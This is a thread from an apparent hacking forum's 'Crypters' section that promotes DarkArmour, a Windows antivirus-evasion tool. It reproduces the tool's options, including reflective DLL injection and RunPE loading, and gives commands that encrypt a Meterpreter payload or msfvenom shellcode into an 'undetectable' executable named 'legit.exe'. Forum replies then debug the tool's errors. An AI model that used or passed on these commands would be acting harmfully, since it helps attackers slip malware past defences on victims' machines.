Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked DarkArmour [Windows AV Evasion]

dEEpEst

By ADMINdEEpEst
in Crypters

 Share

Recommended Posts

  • Popular Post
dEEpEst Hacker

ADMINdEEpEst

Posted
  • Popular Post
Posted

Windows AV Evasion Tool
Store and execute an encrypted windows binary from inside memory, without a single bit touching disk.

Usage

          _,.
        ,` -.)
       ( _/-\-._
      /,|`--._,-^|           ,¡
      \_| |`-._/||          / /
        |  `-, / |         /  /
        |     || |        /  /  ______           _     ___
         `r-._||/   __   /  /   |  _  \         | |   / _ \
     __,-<_     )`-/  `./  /    | | | |__ _ _ __| | _/ /_\ \_ __ _ __ ___   ___  _   _ _ __
    '  \   `---'     \ /  /     | | | / _` | '__| |/ /  _  | '__| '_ ` _ \ / _ \| | | | '__|
        |           |./  /      | |/ / (_| | |  |   <| | | | |  | | | | | | (_) | |_| | |
        /            /  /       |___/ \__,_|_|  |_|\_\_| |_/_|  |_| |_| |_|\___/ \__,_|_|
    \_/' \       |  /  /
     |    |   _,^-'/  /
     |    , `` (\ /  /_                    By Dylan Halls     |     Version 0.3
    \,.->._     \X-=/^
      (  /   `-._//^`
       `Y-.____(__}
        |     {__)
               ()

usage: darkarmour.py [-h] [-f FILE] -e ENCRYPT [-S SHELLCODE] [-b] [-d] [-u]
                     [-j] [-r] [-s] [-k KEY] [-l LOOP] [-o OUTFILE]

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  file to crypt, assumed as binary if not told otherwise
  -e ENCRYPT, --encrypt ENCRYPT
                        encryption algorithm to use (xor)
  -S SHELLCODE, --shellcode SHELLCODE
                        file contating the shellcode, needs to be in the
                        'msfvenom -f raw' style format
  -b, --binary          provide if file is a binary exe
  -d, --dll             use reflective dll injection to execute the binary
                        inside another process
  -u, --upx             pack the executable with upx
  -j, --jmp             use jmp based pe loader
  -r, --runpe           use runpe to load pe
  -s, --source          provide if the file is c source code
  -k KEY, --key KEY     key to encrypt with, randomly generated if not
                        supplied
  -l LOOP, --loop LOOP  number of levels of encryption
  -o OUTFILE, --outfile OUTFILE
                        name of outfile, if not provided then random filename
                        is assigned

Usage


Generate an undetectable version of a pe executable
./darkarmour.py -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5


Execute shellcode (x86/64) inside memory without detection, just provide the raw shellcode
./darkarmour.py -S -f bins/meter.bin --encrypt xor --jmp -o bins/legit.exe --loop 5

Installation
It uses the python stdlib so no need to worry about any python dependencies, so the only issue you could come accoss are binary dependencies. The required binarys are: i686-w64-mingw32-g++, i686-w64-mingw32-gcc and upx (probly osslsigncode soon as well).
These can all be installed via apt.
sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode

TODO

Intergrate into PowerUp
Optional signing of binarys
Load pe image over a socket so not stored inside the binary

 

DOWNLOAD

This is the hidden content, please

Link to comment
Share on other sites
yarshi Leech

INACTIVE yarshi

Posted
Posted

 

While running the generated exe .... consoles opens an show "Unable to call PE,likely thats invalid"

 

and if using runpe option it gaves error..

"Traceback (most recent call last):
  File "1.py", line 116, in <module>
    darkarmour.run(vars(ap.parse_args()))
  File "1.py", line 96, in run
    self._do_crypt()
  File "1.py", line 91, in _do_crypt
    if self.runpe:
AttributeError: 'DarkArmour' object has no attribute 'runpe'"

Link to comment
Share on other sites
yarshi Leech

INACTIVE yarshi

Posted
Posted
On 1/27/2020 at 6:28 AM, 0x1 said:

This is the hidden content, please

This is the hidden content, please

No use option --runpe (is null) use --jump

This is the hidden content, please

 

still getting same error with  your commands also..and yeah  used --jmp not pe ones if pe ones used then it gave erorr and --jmp ones get compiled successfully but unable to run

this error came while running a binary output: ""Unable to call PE,likely thats invalid""

 

 

Link to comment
Share on other sites
yarshi Leech

INACTIVE yarshi

Posted
Posted
On 1/31/2020 at 3:59 PM, 0x1 said:

Problem with the code try to contact the developer

Maybe the error because the PE is different to image_base

int main() :

This is the hidden content, please

 

yeah looks like same to me...willy try to see if i get contacted to developer

Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.